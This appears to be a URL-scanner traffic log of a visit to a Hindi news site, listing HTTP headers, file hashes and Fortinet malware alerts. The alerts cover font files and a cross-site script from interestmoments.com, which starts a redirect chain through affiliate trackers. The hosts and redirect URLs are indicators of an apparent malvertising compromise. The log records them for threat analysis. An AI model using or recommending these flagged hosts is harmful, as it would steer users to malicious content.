Etag: "6391aeb7-118"
Expires: Sat, 10 Dec 2022 09:30:32 GMT
Last-Modified: Thu, 08 Dec 2022 09:30:31 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 280

                                        
                                            GET /wp-content/themes/Newspaper/images/icons/newspaper.woff?20 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://mp48update.com/wp-content/themes/Newspaper/style.css?ver=11.5
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/font-woff
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,User-Agent
last-modified: Thu, 18 Aug 2022 08:29:39 GMT
etag: "703c-5e67fc857b45e"
accept-ranges: bytes
content-length: 28732
cache-control: max-age=172800
expires: Sun, 11 Dec 2022 04:41:57 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 28732, version 0.0\012- data
Size:   28732
Md5:    2192d5f834e8b672a73d67cad66e79f6
Sha1:   ddf3eb377defc2ca0a2a09d3f41da2d006303e13
Sha256: c70da34747fb31860fa118ff5d6736f81661838a0f50f077aa29d63ad7b00e4a

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/td-composer/assets/fonts/td-multipurpose/td-multipurpose.ttf HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/wp-content/plugins/td-composer/assets/fonts/td-multipurpose/td-multipurpose.css?ver=6ea45b81e47c58269b68289d05535e19
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/font-sfnt
                                        
date: Fri, 09 Dec 2022 04:41:58 GMT
server: Apache
vary: IS_SUBREQ,User-Agent
last-modified: Thu, 18 Aug 2022 08:29:58 GMT
etag: "1fa3c-5e67fc97103bd"
accept-ranges: bytes
content-length: 129596
cache-control: max-age=172800
expires: Sun, 11 Dec 2022 04:41:58 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon \012- data
Size:   129596
Md5:    d298563afb36ab47c7ad74da6eb85ae7
Sha1:   a1b856e0f086653b9e602c9d619e5b4394caf0ec
Sha256: 95c06a3e6c28a512b08155b23f867f4699ce33d79ef8ef7a229ee6a33a6c83f6

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "7F5BFB7D4DD9DFB0A73B8C29966C5C3B8459B9853E3E660244840BEA1EF6D59D"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=17194
Expires: Fri, 09 Dec 2022 09:28:32 GMT
Date: Fri, 09 Dec 2022 04:41:58 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/uploads/2022/08/MP48-UPDATE-logo-01-300x128.png HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: image/png
                                        
date: Fri, 09 Dec 2022 04:41:58 GMT
server: Apache
vary: IS_SUBREQ,User-Agent,Accept-Encoding
last-modified: Thu, 18 Aug 2022 18:55:49 GMT
etag: "514e-5e68887b0a222"
accept-ranges: bytes
content-length: 20814
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:58 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 300 x 128, 8-bit/color RGBA, non-interlaced\012- data
Size:   20814
Md5:    7ddf58d918a5e3617465679078f7d322
Sha1:   d50f1813471a595d396f17b92a45bba99e132fb2
Sha256: 3d24db7a934b35b3bdddb349213b8a8dd58f0aac18ef3def3a6126b0a1f2098c
                                        
                                            GET /scripts/trim.js HTTP/1.1 
Host: js.interestmoments.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         193.169.194.63
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:41:58 GMT
Last-Modified: Wed, 07 Dec 2022 11:41:13 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ETag: W/"63907bd9-192c"
Expires: Mon, 19 Dec 2022 04:41:58 GMT
Cache-Control: max-age=864000
Access-Control-Allow-Origin: *
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (6444), with no line terminators
Size:   2194
Md5:    68f64aa377a0e32ed510fd286ffd5b48
Sha1:   d215b23cb14a3dbd5474bbdbe9290541c449359d
Sha256: 0facd0bcf777d8176a4bbc3e14172fdab4c11aae196591ee3ba8ffddee0ec042

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C21C8AB33725A1163610B16EAB04FDFFBD6BD129D925CBA62E4F25933319D734"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21550
Expires: Fri, 09 Dec 2022 10:41:08 GMT
Date: Fri, 09 Dec 2022 04:41:58 GMT
Connection: keep-alive

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   2417
Md5:    5c11375258e8c506276d5a2b49c49853
Sha1:   16b35af3a88bf339b282ebfce1ce18b55ae696a3
Sha256: 012f7523e821dde1378fac9109e325a72b6f15af6b20f6d363057d5f304259ab
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/plugins/live-news/public/assets/img/clock.png HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Cookie: _ga_VS9R69MEY9=GS1.1.1670560917.1.0.1670560917.0.0.0; _ga=GA1.1.1578828926.1670560918; trainmeassystt=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: image/png
                                        
date: Fri, 09 Dec 2022 04:41:58 GMT
server: Apache
vary: IS_SUBREQ,User-Agent,Accept-Encoding
last-modified: Thu, 18 Aug 2022 19:24:52 GMT
etag: "94-5e688ef8ae56d"
accept-ranges: bytes
content-length: 148
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:58 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   30839
Md5:    4684d3ef4505cafb41bf387c3f557011
Sha1:   cb0afa276f9ca0f4476b3af208607225c83ccef1
Sha256: 7efc275d26ef99ddd1ec3c2a972e01bf1cf73df840a006d58e5b95fbc86ea8f8
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6F7DD84273E1FFB40CE8A97996038AF95D949A2CFE6031FEB866CB9D73FC54DB"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13951
Expires: Fri, 09 Dec 2022 08:34:29 GMT
Date: Fri, 09 Dec 2022 04:41:58 GMT
Connection: keep-alive

                                        
                                            GET /go/brad-way.php?id=16477-22-569654345&pid=235&qid=473 HTTP/1.1 
Host: long.interestmoments.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         193.169.194.63
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:41:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://long.interestmoments.com/go/brad-way.php?id=568658-12-0956346&pid=3457&lid=05679333&jid=38834&from=astronomer
Access-Control-Allow-Origin: *

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:58 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /g/collect?v=2&tid=G-VS9R69MEY9&gtm=2oebu0&_p=573030463&cid=1578828926.1670560918&ul=en-us&sr=1280x1024&_s=1&sid=1670560917&sct=1&seg=0&dl=https%3A%2F%2Fmp48update.com%2F&dt=Hindi%20news%2C%20Hindi%20samachar%2C%20letest%20news%2C%20Breaking%20News%2C%20Top%20Hindi%20News%2C%20%E0%A4%B9%E0%A4%BF%E0%A4%82%E0%A4%A6%E0%A5%80%20%E0%A4%A8%E0%A5%8D%E0%A4%AF%E0%A5%82%E0%A5%9B%20-%20Mp48update&en=page_view&_fv=1&_nsi=1&_ss=1&_ee=1 HTTP/1.1 
Host: region1.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://mp48update.com
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Content-Length: 0

search
                                         216.239.34.36
HTTP/2 204 No Content
content-type: text/plain
                                        
access-control-allow-origin: https://mp48update.com
date: Fri, 09 Dec 2022 04:41:59 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2

                                        
                                            GET /go/brad-way.php?id=568658-12-0956346&pid=3457&lid=05679333&jid=38834&from=astronomer HTTP/1.1 
Host: long.interestmoments.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://mp48update.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         193.169.194.63
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:41:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   438
Md5:    0525d77ebdf7de03d247fdcd914fc360
Sha1:   5ec7fc9668bf62b50ab46497eb3aa67a60c0496d
Sha256: c548a1af5170a6a7a699b50b9e7bbd50e45d6f7f0f38639e70a80dfabd435781
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:41:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.godaddy.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 76
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         192.124.249.22
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Sucuri/Cloudproxy
Date: Fri, 09 Dec 2022 04:41:59 GMT
Content-Length: 1778
Connection: keep-alive
X-Sucuri-ID: 19022
Content-Transfer-Encoding: Binary
Cache-Control: public, no-transform, must-revalidate
Last-Modified: Thu, 08 Dec 2022 21:59:17 GMT
Expires: Fri, 09 Dec 2022 21:59:17 GMT
ETag: "40ea8909f2aac96032417bb8fb892e4146e3ba89"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"


--- Additional Info ---
Magic:  data
Size:   1778
Md5:    c04f51cc41113a5b6da0a567c833fe9d
Sha1:   40ea8909f2aac96032417bb8fb892e4146e3ba89
Sha256: 3608749bb21624365f699232f44c1cb4d316c97c39008d0514f70d5968b21a4b
                                        
                                            GET /click?pid=1287&offer_id=71&ref_id=i0tjaeieut6esito8bis&sub1=E0CDNGBJ6R HTTP/1.1 
Host: track.wg-aff.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         35.204.130.99
HTTP/2 302 Found
                                        
server: nginx
date: Fri, 09 Dec 2022 04:41:59 GMT
content-length: 0
location: https://trck.wargaming.net/ujoxix0l/?t=1&pub_id=1287&xid=6392bc9709e8870001471b53&xid_param1=E0CDNGBJ6R&xid_param_2=
x-adjust-use-original-forwarded-for: 1
set-cookie: afclick=6392bc9709e8870001471b53; expires=Sat, 09 Dec 2023 04:41:59 GMT; secure; SameSite=None afoffers={"71":1670560919}; expires=Sat, 09 Dec 2023 04:41:59 GMT; secure; SameSite=None
access-control-allow-origin: *
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2065
Cache-Control: 'max-age=158059'
Date: Fri, 09 Dec 2022 04:42:00 GMT
Last-Modified: Fri, 09 Dec 2022 04:07:35 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /ujoxix0l/?t=1&pub_id=1287&xid=6392bc9709e8870001471b53&xid_param1=E0CDNGBJ6R&xid_param_2= HTTP/1.1 
Host: trck.wargaming.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         92.223.23.230
HTTP/1.1 301 Moved Permanently
Content-Type: text/plain; charset=utf-8
                                        
Server: nginx
Date: Fri, 09 Dec 2022 04:42:00 GMT
Content-Length: 22
Connection: keep-alive
Location: https://promo.worldofwarships.eu/glows-46780/eu-no/?t=1&pub_id=1287&xid=6392bc9709e8870001471b53&xid_param1=E0CDNGBJ6R&xid_param_2=&sid=SIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA&enctid=cox0f7zg6w15&lpsn=WOWS+template1+new+animated+lp-v1&foris=1&teclient=1670560920082270349&utm_source=wlap&utm_medium=affiliate&utm_campaign=ujoxix0l&utm_content=1287
Set-Cookie: STIDREFERRAL=SIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA; Domain=wargaming.net; Max-Age=2592000; Path=/; SameSite=None; Secure enctid=cox0f7zg6w15; Domain=wargaming.net; Max-Age=2592000; Path=/; SameSite=None; Secure teclient=1670560920082270349; Domain=wargaming.net; Max-Age=315360000; Path=/; SameSite=None; Secure
Cache-Control: no-cache


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    0e0bf67572311f8a23814419ff24ee9a
Sha1:   78328dfc54708433cdfb3e7857e57f87ec443b08
Sha256: c5f6c267ba4a2964fff5d304d4a1e79c371ce30d32eaf017b3bb40becccd58d2
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "8CE43F6728ED3E5EA6ADFD519C2C4B0EDFE36F7D2B64457F19EB691D467B833E"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3032
Expires: Fri, 09 Dec 2022 05:32:32 GMT
Date: Fri, 09 Dec 2022 04:42:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "8CE43F6728ED3E5EA6ADFD519C2C4B0EDFE36F7D2B64457F19EB691D467B833E"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3032
Expires: Fri, 09 Dec 2022 05:32:32 GMT
Date: Fri, 09 Dec 2022 04:42:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "8CE43F6728ED3E5EA6ADFD519C2C4B0EDFE36F7D2B64457F19EB691D467B833E"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3032
Expires: Fri, 09 Dec 2022 05:32:32 GMT
Date: Fri, 09 Dec 2022 04:42:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "8CE43F6728ED3E5EA6ADFD519C2C4B0EDFE36F7D2B64457F19EB691D467B833E"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3032
Expires: Fri, 09 Dec 2022 05:32:32 GMT
Date: Fri, 09 Dec 2022 04:42:00 GMT
Connection: keep-alive

                                        
                                            GET /glows-46780/src/images/wowsl_logo.png HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
content-length: 10514
last-modified: Thu, 17 Nov 2022 14:17:13 GMT
etag: "4d9371a87a4f9a0d6a8792e0397aa303"
x-amz-request-id: tx0000000000000004dd575-00637642a3-1ce07b18-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:41+00:00
x-id: sto5-up-gc13
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 749 x 299, 8-bit colormap, non-interlaced\012- data
Size:   10514
Md5:    4d9371a87a4f9a0d6a8792e0397aa303
Sha1:   1308b49f8614f0ab05e81698daf5bfc4a2498bf0
Sha256: 68ddcc9fad945493001c241d8de6fb9acdd436bc82bff503302dbffa64f4f5ed
                                        
                                            GET /glows-46780/src/images/footer-logo.png HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
content-length: 1939
last-modified: Thu, 17 Nov 2022 14:17:13 GMT
etag: "7ce94cd1324102c254e60ced58661dc3"
x-amz-request-id: tx00000000000000072778a-00637642a3-1cdd7ef6-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:42+00:00
x-id: sto5-up-gc13
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 275 x 63, 8-bit colormap, non-interlaced\012- data
Size:   1939
Md5:    7ce94cd1324102c254e60ced58661dc3
Sha1:   b76e3b4e14cf98aa766788bc8cf4fbc97058fec0
Sha256: fdd269a537d61d3fafbef167c6c7e22ae7707217427b506674f5f0d2f3caed48
